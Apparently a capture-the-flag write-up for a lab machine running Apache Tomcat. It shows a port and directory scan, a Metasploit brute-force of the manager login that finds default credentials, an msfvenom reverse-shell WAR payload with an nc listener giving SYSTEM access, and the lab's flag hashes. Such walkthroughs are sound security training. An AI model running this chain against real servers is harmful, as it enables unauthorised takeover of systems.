nmap -T4 -p- -A -Pn
feroxbuster -u -w /usr/share/wordlists/dirb/common.txt -x php,html,bak,js,txt,json,docx,pdf,zip --extract-links --scan-limit 2 --filter-status 401,403,404,405,500 --silent
msfconsole -q
search tomcat login
use auxiliary/scanner/http/tomcat_mgr_login
show options
#we get creds
msfvenom -p java/shell_reverse_tcp lhost= lport=4445 -f war -o reverse-shell.war
#creating malicious war payload
nc -nvlp 4445
#setup listener
#upload, deploy and check war file
#we get reverse shell
cd C:\Users\Administrator\Desktop
#get flags
Open ports & services:
* 8080 - http - Apache Tomcat/Coyote JSP engine 1.1
We can enumerate web directories to check for anything interesting.
We have basic authentication in /manager/html and /host-manager/html
We can attempt logging into /manager/html with the help of msfconsole.
Using the tomcat_mgr_login module, we get login using creds tomcat:s3cret
Now, we can Google 'apache tomcat malicious WAR file' as the next step to get reverse shell.
After creating our payload with msfvenom and uploading it at /manager/html/upload, we need to deploy it and click the link to activate reverse shell; we will have to setup our listener as well.
Upon visiting the link, we get reverse shell as 'nt authority\system'.
Both flags can be found in Administrator's Desktop.
User flag - 7004dbcef0f854e0fb401875f26ebd00
Root flag - 04a8b36e1545a455393d067e772fe90e